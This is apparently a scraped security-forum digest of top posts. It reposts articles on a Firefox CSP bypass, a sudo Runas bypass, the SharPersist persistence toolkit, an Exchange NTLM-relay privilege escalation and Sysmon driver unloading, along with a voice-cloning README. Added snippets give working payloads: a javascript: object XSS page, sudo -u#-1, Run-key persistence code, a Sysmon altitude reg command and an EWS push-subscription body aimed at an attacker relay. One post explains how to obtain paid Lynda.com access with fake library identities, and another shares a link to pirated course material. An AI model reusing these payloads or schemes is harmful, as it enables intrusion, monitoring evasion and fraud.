

Popular Content

Showing content with the highest reputation since 09/22/19 in Posts

  1. 6 points
    Real-Time Voice Cloning

This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real time. Feel free to check my thesis if you're curious, or if you're looking for info I haven't documented yet (don't hesitate to open an issue for that too). Mostly I would recommend giving a quick look to the figures beyond the introduction.

SV2TTS is a three-stage deep learning framework that makes it possible to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices.

Video demonstration (click the picture).

Papers implemented (URL | Designation | Title | Implementation source):
- 1806.04558 | SV2TTS | Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis | This repo
- 1802.08435 | WaveRNN (vocoder) | Efficient Neural Audio Synthesis | fatchord/WaveRNN
- 1712.05884 | Tacotron 2 (synthesizer) | Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions | Rayhane-mamah/Tacotron-2
- 1710.10467 | GE2E (encoder) | Generalized End-To-End Loss for Speaker Verification | This repo

News
- 20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it.
- 06/07/19: Need to run within a docker container on a remote server? See here.
- 25/06/19: Experimental support for low-memory GPUs (~2 GB) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM.

Quick start

Requirements
You will need the following whether you plan to use the toolbox only or to retrain the models:
- Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib.
- Run pip install -r requirements.txt to install the necessary packages.
- Additionally you will need PyTorch (>=1.0.1).
- A GPU is mandatory, but you don't necessarily need a high-tier GPU if you only want to use the toolbox.

Pretrained models
Download the latest here.

Preliminary
Before you download any dataset, you can begin by testing your configuration with:
python demo_cli.py
If all tests pass, you're good to go.

Datasets
For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100, where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox; see here. You're free not to download any dataset, but then you will need your own data as audio files, or you will have to record it with the toolbox.

Toolbox
You can then try the toolbox:
python demo_toolbox.py -d <datasets_root>
or
python demo_toolbox.py
depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue.

Wiki
- How it all works (WIP - stub; you might be better off reading my thesis until it's done)
- Training models yourself
- Training with other data/languages (WIP - see here for now)
- TODO and planned features

Contribution
Feel free to open issues or PRs for any problem you may encounter, typos that you see, or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute.

Source: https://github.com/CorentinJ/Real-Time-Voice-Cloning
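The encoder stage (GE2E) is what makes cloning from a few seconds of audio possible: it maps an utterance to a fixed-size embedding, and utterances from the same speaker land close together under cosine similarity. A toy illustration of that comparison in pure Python (the 4-dimensional vectors here are made up for the example; the real encoder produces much higher-dimensional embeddings learned from speech):

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two embedding vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb)

# Hypothetical embeddings: two utterances of one speaker, one of another.
utt1 = [0.9, 0.1, 0.3, 0.2]
utt2 = [0.8, 0.2, 0.35, 0.15]
other = [0.1, 0.9, 0.1, 0.8]

same = cosine_similarity(utt1, utt2)
diff = cosine_similarity(utt1, other)
# Same-speaker utterances should score higher than cross-speaker ones.
assert same > diff
```

In SV2TTS this similarity structure is what the synthesizer conditions on: any point in the embedding space, even from an unseen speaker, can drive the voice of the generated speech.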
  2. 4 points
    When I have time I'll do some cleanup (without regard for the seniority or usefulness of users who mock and swear). Even though it's not the best question, show some intelligence and offer an answer that helps him understand how things work.
  3. 3 points
    A technique to evade Content Security Policy (CSP) leaves surfers using the latest version of Firefox vulnerable to cross-site scripting (XSS) exploits.

Researcher Matheus Vrech uncovered a full-blown CSP bypass in the latest version of Mozilla's open source web browser that relies on using an object tag attached to a data attribute that points to a JavaScript URL. The trick allows potentially malicious content to bypass the CSP directive that would normally prevent such objects from being loaded.

Vrech developed proof-of-concept code that shows the trick working in the current version of Firefox (version 69). The Daily Swig was able to confirm that the exploit worked. The latest beta versions of Firefox are not vulnerable, as Vrech notes. Chrome, Safari, and Edge are unaffected.

If left unaddressed, the bug could make it easier to execute certain XSS attacks that would otherwise be foiled by CSP. The Daily Swig has invited Mozilla to comment on Vrech's find, which he is hoping will earn recognition under the software developer's bug bounty program.

The researcher told The Daily Swig about how he came across the vulnerability. "I was playing ctf [capture the flag] trying to bypass a CSP without object-src CSP rule and testing some payloads I found this non intended (by anyone) way," he explained. "About the impact: everyone that was stuck in a bug bounty XSS due to CSP restrictions should have reported it by this time."

Content Security Policy is a technology set by websites and used by browsers that can block external resources and prevent XSS attacks. PortSwigger researcher Gareth Heyes discussed this and other aspects of browser security at OWASP's flagship European event late last month.

Source: https://portswigger.net/daily-swig/firefox-vulnerable-to-trivial-csp-bypass
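The payload class described above (an object tag whose data attribute is a javascript: URL) is easy to reproduce as data for testing. This sketch only assembles a test page carrying a restrictive CSP plus the payload shape the article describes; the exact PoC markup is an assumption inferred from the write-up, and the file is inert until opened in a vulnerable browser:

```python
# A CSP that should block script execution and plugin content entirely.
csp = "default-src 'none'"

# The reported trick: an <object> whose data attribute is a javascript: URL.
payload = '<object data="javascript:alert(document.domain)"></object>'

page = (
    "<!doctype html>\n"
    f'<meta http-equiv="Content-Security-Policy" content="{csp}">\n'
    f"{payload}\n"
)
print(page)
```

On a patched browser the object's javascript: URL is refused under this policy; the bug was that Firefox 69 executed it anyway.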
  4. 3 points
    Source: Financial Times. Goodbye to cryptography as we know it? ...
  5. 2 points
    1. Go to Cuyahoga County Public Library. 2. Click "My Account", then "Create Account". 3. Open Fake Name Generator. 4. Enter the data from Fake Name Generator into the Cuyahoga Library account, with two notes: use an Ohio zip code and an e-mail address you can actually access. 5. Check your e-mail and copy the Access Number, then go back to Cuyahoga County Public Library, enter just the Access Number, and you'll be asked to create a 4-digit PIN. 6. Go to Lynda.com, select "Sign In", then select "Sign in with your organization portal". Enter the library's link there, then the Access Number and the PIN you just chose. And that's it, you have an account. If you have questions, ask them intelligently. If you already knew this, you can skip the topic. I don't know how long this lasts, but even a month of access is fine. It takes at most 5 minutes to set up everything explained above. Good luck. EDIT: This doesn't only work with Cuyahoga Library. You can go to Free Library and pick a library from there, as long as it's one that issues cards online, complete with Access Number and PIN.
  6. 2 points
    Sudo Flaw Lets Linux Users Run Commands As Root Even When They're Restricted

Attention Linux users! A new vulnerability has been discovered in Sudo, one of the most important, powerful, and commonly used utilities that comes as a core command installed on almost every UNIX and Linux-based operating system.

The vulnerability in question is a sudo security policy bypass issue that could allow a malicious user or a program to execute arbitrary commands as root on a targeted Linux system, even when the "sudoers configuration" explicitly disallows root access.

Sudo, which stands for "superuser do," is a system command that allows a user to run applications or commands with the privileges of a different user without switching environments; most often, it is used for running commands as the root user.

By default on most Linux distributions, the ALL keyword in the RunAs specification in the /etc/sudoers file, as shown in the screenshot, allows all users in the admin or sudo groups to run any command as any valid user on the system.

Reference link: https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html?fbclid=IwAR1V9EZDp75uQdBgcQxV4t4C0THHguOtNkIk7o1PfapQPJEt9FaZmFK58Mg
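The flaw the linked article covers is CVE-2019-14287: invoking sudo as `sudo -u#-1` slips past a Runas restriction because the parsed user ID -1, handed to setresuid(), means "leave the uid unchanged", and sudo is already running as root at that point. A small sketch of the integer wrap involved (the exploit command is shown as data only, nothing is executed):

```python
# sudo parses the "#uid" form into a signed value; -1 wraps to the
# 32-bit unsigned 4294967295, which setresuid() treats as "do not
# change this uid" -- leaving sudo's own effective uid (root) in place.
requested_uid = -1
as_unsigned = requested_uid & 0xFFFFFFFF
assert as_unsigned == 4294967295

# The reported bypass invocation, represented as an argument list:
exploit = ["sudo", "-u#-1", "id"]
print(as_unsigned, exploit)
```

Both `-u#-1` and `-u#4294967295` trigger the same code path; sudo 1.8.28 fixed the check.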
  7. 2 points
    Once you're in there, there's no escape, just so you know. I only survived a week there :)))
  8. 2 points
    Retro gaming console based on the Raspberry Pi 3 Model B
- Kintaro Super Kuma 9000 case, with power on/off button, reset button, fan
- Raspberry Pi 3 Model B, with 16GB Toshiba SD card
- Good 3A 5V charger that doesn't undervolt

Both buttons are functional. The case has a fan installed that runs when the board is under load; I even used Arctic MX-4 thermal paste for better temperatures. On the SD card I installed RetroPie and ROMs for various emulators. Basically the system has everything you need on it to play. Price: 200 RON
  9. 2 points
    Threat Research

SharPersist: Windows Persistence Toolkit in C#
September 03, 2019 | by Brett Hawkins
powershell, persistence, Toolkit, Windows

Background

PowerShell has been used by the offensive community for several years now, but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, the Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant's Red Team called SharPersist.

Windows Persistence

During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1.

Figure 1: FireEye Attack Lifecycle Diagram

Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, the registry, and the startup folder, and more continue to be discovered. For a more thorough list, see the MITRE ATT&CK persistence page.

Figure 2: Persistence equation

SharPersist Overview

SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike's "execute-assembly" functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several tradecraft items built into the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden. SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page.

SharPersist Persistence Techniques

There are several persistence techniques supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3.

Technique | Description | Switch (-t) | Admin privileges required? | Touches registry? | Adds/modifies files on disk?
KeePass | Backdoor KeePass configuration file | keepass | No | No | Yes
New Scheduled Task | Creates new scheduled task | schtask | No | No | Yes
New Windows Service | Creates new Windows service | service | Yes | Yes | No
Registry | Registry key/value creation/modification | reg | No | Yes | No
Scheduled Task Backdoor | Backdoors existing scheduled task with additional action | schtaskbackdoor | Yes | No | Yes
Startup Folder | Creates LNK file in user startup folder | startupfolder | No | No | Yes
Tortoise SVN | Creates Tortoise SVN hook script | tortoisesvn | No | Yes | No

Figure 3: Table of supported persistence techniques

SharPersist Examples

On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below.

Registry Persistence

The first technique that will be highlighted is registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4.

Key code (-k) | Registry key | Registry value | Admin privileges required? | Supports env add-on (-o env)?
hklmrun | HKLM\Software\Microsoft\Windows\CurrentVersion\Run | User supplied | Yes | Yes
hklmrunonce | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | User supplied | Yes | Yes
hklmrunonceex | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | User supplied | Yes | Yes
userinit | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | Userinit | Yes | No
hkcurun | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | User supplied | No | Yes
hkcurunonce | HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | User supplied | No | Yes
logonscript | HKCU\Environment | UserInitMprLogonScript | No | No
stickynotes | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | RESTART_STICKY_NOTES | No | No

Figure 4: Supported registry keys table

In the following example, we will perform a validation of our arguments and then add registry persistence. Performing a validation before adding the persistence is a best practice, as it makes sure that you have the correct arguments and pass other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named "Test" with the value "cmd.exe /c calc.exe" in the "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" registry key.

Figure 5: Adding registry persistence

Once the persistence needs to be removed, it can be removed using the "-m remove" argument, as shown in Figure 6. We remove the "Test" registry value that was created previously, and then list all registry values in "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" to validate that it was removed.

Figure 6: Removing registry persistence

Startup Folder Persistence

The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we create an LNK file called "Test.lnk" that will be placed in the current user's startup folder and will execute "cmd.exe /c calc.exe", shown in Figure 7.

Figure 7: Performing dry-run and adding startup folder persistence

The startup folder persistence can then be removed, again using the "-m remove" argument, as shown in Figure 8. This will remove the LNK file from the current user's startup folder.

Figure 8: Removing startup folder persistence

Scheduled Task Backdoor Persistence

The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.

Figure 9: Listing scheduled tasks that run at logon

Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work, and then actually execute the command, as shown in Figure 10.

Figure 10: Performing dry run and adding scheduled task backdoor persistence

As you can see in Figure 11, the scheduled task is now backdoored with our malicious action.

Figure 11: Listing backdoored scheduled task

A backdoored scheduled task action used for persistence can be removed as shown in Figure 12.

Figure 12: Removing backdoored scheduled task action

Conclusion

Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community, and persistence is no exception. Windows provides multiple techniques for persistence, and more will continue to be discovered and used by security professionals and adversaries alike. This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques available in Windows and the ability to use these techniques with C# rather than PowerShell.

Source: https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
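As an illustration of how small the registry persistence primitive from Figure 5 really is, here is a hedged Python sketch of the same hkcurun write using only the standard library's winreg module (SharPersist itself is C#; the value name and payload below are the article's examples, and the non-Windows branch just prints what would be written):

```python
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
VALUE_NAME = "Test"               # value name from the article's Figure 5
PAYLOAD = r"cmd.exe /c calc.exe"  # payload from the article's Figure 5

def add_run_key(value_name, payload):
    """Create (or overwrite) a value under HKCU\\...\\Run."""
    import winreg  # Windows-only standard library module
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY, 0,
                        winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, value_name, 0, winreg.REG_SZ, payload)

if sys.platform == "win32":
    add_run_key(VALUE_NAME, PAYLOAD)
else:
    print(f"Would set HKCU\\{RUN_KEY}\\{VALUE_NAME} = {PAYLOAD!r}")
```

Removal is the mirror image (winreg.DeleteValue on the same key), which is what the "-m remove" mode in Figure 6 does under the hood for this technique.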
  10. 2 points
    A repair shop asked me 80 RON for it, to hell with them; in 3, 4, 5 hours you can fix it yourself and keep the money for a sandwich, cigarettes, and beer. Try https://forum.xda-developers.com/
  11. 1 point
  12. 1 point
    Yes bro @SynTAX, good thing you warned me. Here @adytzu123456, I have an invitation code posted as hidden so unregistered users can't see it; use it, because it expires in 24h.
  13. 1 point
    @aismen, the guy wants an invitation. I think you had one.
  14. 1 point
  15. 1 point
    1- Web Application Penetration Testing eXtreme (eWPTX)
----------------------------------------------------
03. Website_cloning.mp4
03. From_An_XSS_To_A_SQL_Injection.mp4
03. Keylogging.mp4
09. Advanced XXE Exploitation.MP4
07. Advanced_SecondOrder_SQL_Injection_Exploitation.mp4
05. Advanced_XSRF_Exploitation_part_i.mp4
06. Advanced_XSRF_Exploitation_part_ii.mp4
09. Advanced_Xpath_Exploitation.mp4
WAPTx sec 9.pdf
WAPTx sec 8.pdf
WAPTx sec 2.pdf
WAPTx sec 3.pdf
WAPTx sec 5.pdf
WAPTx sec 6.pdf
WAPTx sec 4.pdf
WAPTx sec 7.pdf
WAPTx sec 1.pdf

2- Penetration Testing Professional (ePTPv3)

3- Web Application Penetration Testing (eWAPT v2)
----------------------------------------------------
Penetration Testing Process
Introduction
Information Gathering
Cross Site Scripting
SQL Injection
Authentication and Authorization
Session Security
HTML5
File and Resources Attacks
Other Attacks
Web Services
XPath

https://mega.nz/#!484ByQRa!N7-wnQ3t5pMCavOvzh8-xMiMKSD2RARozRM99v17-8I
Pass: P8@Hu%vbg_&{}/2)p+4T

Source:
  16. 1 point
    Microsoft Exchange – Privilege Escalation
September 16, 2019 | Administrator | Red Team
CVE-2018-8581, Microsoft Exchange, NTLM Relay, Privilege Escalation, PushSubscription

Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence, and domain escalation. However, information stored in emails can be highly sensitive for an organisation, and therefore a threat actor's focus may be to exfiltrate data from emails. This can be achieved either by adding a rule to the mailbox of a target user that will forward emails to an inbox the attacker controls, or by delegating access of a mailbox to their Exchange account.

Dustin Childs from the Zero Day Initiative discovered a vulnerability in Microsoft Exchange that could allow an attacker to impersonate a target account. This vulnerability exists because, by design, Microsoft Exchange allows any user to specify a URL for a push subscription, and Exchange will send notifications to this URL. NTLM hashes are also leaked, and can be used to authenticate with Exchange Web Services via NTLM relay. The technical details of the vulnerability have been covered in the Zero Day Initiative blog.

Email Forwarding

Accessing the compromised account from the Outlook Web Access (OWA) portal and selecting the permissions of the inbox folder will open a new window that contains the permissions of the mailbox.

Inbox Permissions

The target account should be added to have permissions over the mailbox. This is required in order to retrieve the SID (Security Identifier) of the account.

Add Permissions for the Target Account

Opening the Network console in the browser and browsing a mailbox folder will generate a request that is sent to the Microsoft Exchange server.

POST Request to Microsoft Exchange

Examining the HTTP response of the request will unveil the SID of the Administrator account.

Administrator SID

The implementation of this attack requires two python scripts from the Zero Day Initiative GitHub repository. The serverHTTP_relayNTLM.py script requires the SID of the Administrator that has been retrieved, the IP address of the Exchange server with the target port, and the email account that has been compromised and is in the control of the red team.

Configuration of the serverHTTP_relayNTLM script

Once the script has the correct values, it can be executed in order to start a relay server:

python serverHTTP_relayNTLM.py

Relay Server

The Exch_EWS_pushSubscribe.py script requires the domain credentials and domain of the compromised account, and the IP address of the relay server.

Push Subscribe Script Configuration

Executing the python script will attempt to send the pushSubscribe requests to Exchange via EWS (Exchange Web Services):

python Exch_EWS_pushSubscribe.py

pushSubscribe python script

Exchange Response

XML Response

The NTLM hash of the Administrator will be relayed back to the Microsoft Exchange server.

Relay Administrator NTLM
Relay Administrator NTLM to Exchange

Emails that are sent to the mailbox of the target account (Administrator) will be forwarded automatically to the mailbox that is under the control of the red team.

Email to target account

The email will be forwarded to the inbox of the account that the red team controls.

Email forwarded automatically

A rule has been created on the target account, by using NTLM relay to authenticate with Exchange, that will forward all email messages to another inbox. This can be validated by checking the inbox rules of the target account.

Rule – Forward Admin Emails

Delegate Access

Microsoft Exchange users can connect their account (Outlook or OWA) to other mailboxes (delegate access) if they have the necessary permissions assigned. Attempting to open the mailbox of another account directly, without permissions, will produce the following error.

Open Another Mailbox – No Permissions

There is a python script which exploits the same vulnerability, but instead of adding a forwarding rule it assigns the account permissions to access any mailbox in the domain, including that of the domain administrator. The script requires valid credentials, the IP address of the Exchange server, and the target email account.

Script Configuration

Executing the python script will attempt to perform the elevation:

python2 CVE-2018-8581.py

Privilege Escalation Script

Once the script has finished, a message will appear informing the user that the mailbox of the target account can be displayed via Outlook or the Outlook Web Access portal.

Privilege Escalation Script – Delegation Complete

Authentication with Outlook Web Access is needed in order to view the delegated mailbox.

Outlook Web Access Authentication

Outlook Web Access has a functionality which allows an Exchange user to open the mailbox of another account if he has permissions.

Open Another Mailbox

The following window will appear on the screen.

Open Another Mailbox Window

The mailbox of the Administrator will open in another tab, confirming the elevation of privileges.

References
https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
https://github.com/thezdi/PoC/tree/master/CVE-2018-8581
https://github.com/WyAtu/CVE-2018-8581

Source: https://pentestlab.blog/2019/09/16/microsoft-exchange-privilege-escalation/
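At the core of the pushSubscribe step is an EWS SOAP request that tells Exchange to deliver push notifications to an attacker-controlled URL, at which point Exchange authenticates outbound and its NTLM can be relayed. A rough sketch of what such a request body looks like, assembled in Python (element names follow the public EWS PushSubscriptionRequest schema; treat the exact envelope and the callback URL as assumptions, the real PoC is in the ZDI repository):

```python
# Hypothetical relay listener the notifications should be sent to.
callback = "http://attacker-relay:8080/"

soap = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest SubscribeToAllFolders="true">
        <t:EventTypes>
          <t:EventType>NewMailEvent</t:EventType>
        </t:EventTypes>
        <t:StatusFrequency>1</t:StatusFrequency>
        <t:URL>{callback}</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>"""
print(soap)
```

The fix Microsoft shipped removed Exchange's excessive privileges when making these outbound notification calls, which is why the relay no longer yields an elevated session on patched servers.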
  17. 1 point
    Shhmon — Silencing Sysmon via Driver Unload
Matt Hand | Sep 18 · 4 min read

Sysmon is an incredibly powerful tool to aid in data collection beyond Windows' standard event logging capabilities. It presents a significant challenge for us as attackers, as it can detect many indicators that we generate during operations, such as process creation, registry changes, and file creation, among many other things.

Sysmon is comprised of two main pieces: a system service and a driver. The driver provides the service with information, which is processed for consumption by the user. Both the service's and the driver's names can be changed from their defaults to obfuscate the fact that Sysmon is running on the host.

Today I am releasing Shhmon, a C# tool to challenge the assumption that our defensive tools are functioning as intended. This also introduces a situation where the Sysmon driver has been unloaded by a user without fltMC.exe while the service is still running.

https://github.com/matterpreter/Shhmon

Despite being able to rename the Sysmon driver during installation (Sysmon.exe -i -d $DriverName), it is loaded at a predefined altitude of 385201 at installation. A driver altitude is a unique identifier allocated by Microsoft indicating the driver's position relative to others in the file system stack. Think of this as a driver's assigned parking spot: each driver has a reserved spot where it is supposed to park, and the driver should abide by this allocation.

We can use functions supplied in fltlib.dll (FilterFindFirst() and FilterFindNext()) to hunt for a driver at altitude 385201 and unload it. This is similar to the functionality behind fltMC.exe unload $DriverName, but it allows us to evade command line logging, which would be captured by Sysmon before the driver is unloaded. In order to unload the driver, the current process token needs to have SeLoadDriverPrivilege enabled, which Shhmon grants to itself using advapi32!AdjustTokenPrivileges.

Defensive Guidance

This technique generates interesting events worth investigating and correlating.

Sysmon Event ID 255: Once the driver is unloaded, an error event with an ID of DriverCommunication will be generated. After this error occurs, logs will no longer be collected and parsed by Sysmon.

Windows System Event ID 1: This event will also be generated on unload from the source "FilterManager", stating File System Filter <DriverName> (Version 0.0, <Timestamp>) unloaded successfully. This event was not observed to be generated during a normal system restart.

Windows Security Event ID 4672: In order to unload the driver, our Shhmon process needs to be granted SeLoadDriverPrivilege. During testing, this permission was only sporadically granted to NT AUTHORITY\SYSTEM and is not part of its standard permission set.

Sysmon Event ID 1 / Windows Security Event ID 4688: Despite the intent of evading command line logging by using the API, the calling process will still be logged. An abnormal, high-integrity process which is assigned SeLoadDriverPrivilege could be correlated with the above events to serve as a starting point for hunting. Bear in mind that this assembly could be used via something like Cobalt Strike's execute-assembly functionality, where a seemingly innocuous binary would be the calling process.

Going beyond these, I have found that Sysmon's driver altitude can be changed via the registry:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\<DriverName>\Instances\Sysmon Instance" /v Altitude /t REG_SZ /d 31337

When the system is rebooted, the driver will be reloaded at the newly specified altitude.

Sysmon with a non-default driver name running at altitude 31337

The new altitude could be discovered by reading the registry key HKLM:\SYSTEM\CurrentControlSet\Services\*\Instances\Sysmon Instance\Altitude, but this adds an additional layer of obfuscation which will need to be accounted for by an attacker.

Note: I have found during testing that if the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

Additionally, there may be an opportunity to audit a handle opening on the \\.\FltMgr device object, which is done by fltlib!FilterUnload, by applying a SACL to the device object. Many thanks to Matt Graeber and Brian Reitz for helping me hone in on these.

References:
- Research inspiration from @Carlos_Perez's post describing this tactic, as well as Matt Graeber and Lee Christensen's Black Hat USA 2018 white paper.
- Alexsey Kabanov's LazyCopy minifilter, for demonstrating the marshaling of filter information and their method for creating resizable buffers.

Posts By SpecterOps Team Members
Written by Matt Hand: I like red teaming, picking up heavy things, and burritos. Adversary Simulation @ SpecterOps. github.com/matterpreter

Source: https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650
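The altitude-change trick shown above is a single registry write. This sketch just assembles that reg.exe command line for a given driver service name so the pieces are easy to see (SysmonDrv is Sysmon's default driver name; nothing is executed here, and a hunter could equally generate this string to diff against observed command lines):

```python
def altitude_reg_command(driver_name, new_altitude):
    """Build the reg.exe argument list that moves a minifilter's altitude."""
    key = (r"HKLM\SYSTEM\CurrentControlSet\Services"
           + f"\\{driver_name}\\Instances\\Sysmon Instance")
    return ["reg", "add", key, "/v", "Altitude",
            "/t", "REG_SZ", "/d", str(new_altitude)]

# Example from the post, with the default driver name assumed.
cmd = altitude_reg_command("SysmonDrv", 31337)
print(" ".join(cmd))
```

Defensively, the same key path (Services\*\Instances\Sysmon Instance\Altitude) is what you would sweep to discover a Sysmon driver hiding at a non-default altitude.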
  18. 1 point
    You Can Run, But You Can’t Hide — Detecting Process Reimaging Behavior Jonathan Johnson Follow Sep 16 · 9 min read Background: Around 3 months ago, a new attack technique was introduced to the InfoSec community known as “Process Reimaging.” This technique was released by the McAfee Security team in a blog titled — “In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass.” A few days after this attack technique was released, a co-worker and friend of mine — Dwight Hohnstein — came out with proof of concept code demonstrating this technique, which can be found on his GitHub. While this technique isn’t yet mapped to MITRE ATT&CK, I believe it would fall under the Defense Evasion Tactic. Although the purpose of this blog post is to show the methodology used to build a detection for this attack, it assumes you have read the blog released by the McAfee team and have looked at Dwight’s proof of concept code. A brief high level outline of the attack is as follows: Process Reimaging is an attack technique that leverages inconsistencies in how the Windows Operating System determines process image FILE_OBJECT locations. This means that an attacker can drop a binary on disk and hide the physical location of that file by replacing its initial execution full file path with a trusted binary. This in turn allows an adversary to bypass Windows operating system process attribute verification, hiding themselves in the context of the process image of their choosing. There are three stages involved in this attack: A binary dropped to disk — This assumes breach and that the attacker can drop a binary to disk. Undetected binary loaded. This will be the original image loaded after process creation. The malicious binary is “reimaged” to a known good binary they’d like to appear as. This is achievable because the Virtual Address Descriptors (VADs) don’t update when the image is renamed. 
Consequently, this allows the wrong process image file information to be returned when queried by applications. This allows an adversary the opportunity to defensively evade detection efforts by analysts and incident responders. Too often organizations are not collecting the “right” data. Often, the data is unstructured, gratuitous, and lacking the substantive details required to arrive at a conclusion. Without quality data, organizations are potentially blind to techniques being ran across their environment. Moreover, by relying too heavily on the base configurations of EDR products (i.e. Windows Defender, etc.) you yield the fine-grained details of detection to a third party which may or may not use the correct function calls to detect this malicious activity (such as the case of GetMappedFileName properly detecting this reimaging). Based off of these factors, this attack allows the adversary to successfully evade detection. For further context and information on this attack, check out the Technical Deep Dive portion in the original blog post on this topic. Note: GetMappedFileName is an API that is used by applications to query process information. It checks whether the address requested is within a memory-mapped file in the address space of the specified process. If the address is within the memory-mapped file it will return the name of the memory-mapped file. This API requires PROCESS_QUERY_INFORMATION and PROCESS_VM_READ access rights. , any time a handle has the access rights PROCESS_QUERY_INFORMATION, it is also granted PROCESS_QUERY_LIMITED_INFORMATION. Those access rights have bitmask 0x1010. This may look familiar, as that is one of the desired access rights used by Mimikatz. Matt Graeber brought to my attention that this is the source of many false positives when trying to detect suspicious access to LSASS based on granted access. 
Transparency:

When this attack was released I spent a Saturday creating a hunt hypothesis, going through the behavioral aspects of the data, and finding its relationships. When reviewing Dwight’s POC I noticed Win32 API calls in the code, and from those I was positive I could correlate those API calls to specific events — an assumption that turned out to be wrong, because like many defenders I had made assumptions regarding EDR products and their logging capabilities. Without a known API-to-Event-ID mapping, I started to map these calls myself. I began (and continue to work on) the Sysmon side of the mapping. This involves reverse engineering the Sysmon driver to map API calls to event registration mechanisms to Event IDs. Huge shoutout to Matt Graeber for helping me in this quest and taking the time to teach me the process of reverse engineering. Creating this mapping was a key part of the detection strategy that I implemented, and it would not have been possible without it.

Process Reimaging Detection:

Detection Methodology: The methodology used for this detection is as follows:

1. Read the technical write-up of the Process Reimaging attack.
2. Read through Dwight’s POC code.
3. Gain knowledge of how the attack executes; create relationships between the data and the behavior of the attack.
4. Execute the attack.
5. Apply the research knowledge with the data relationships to make a robust detection.

Detection Walk-Through

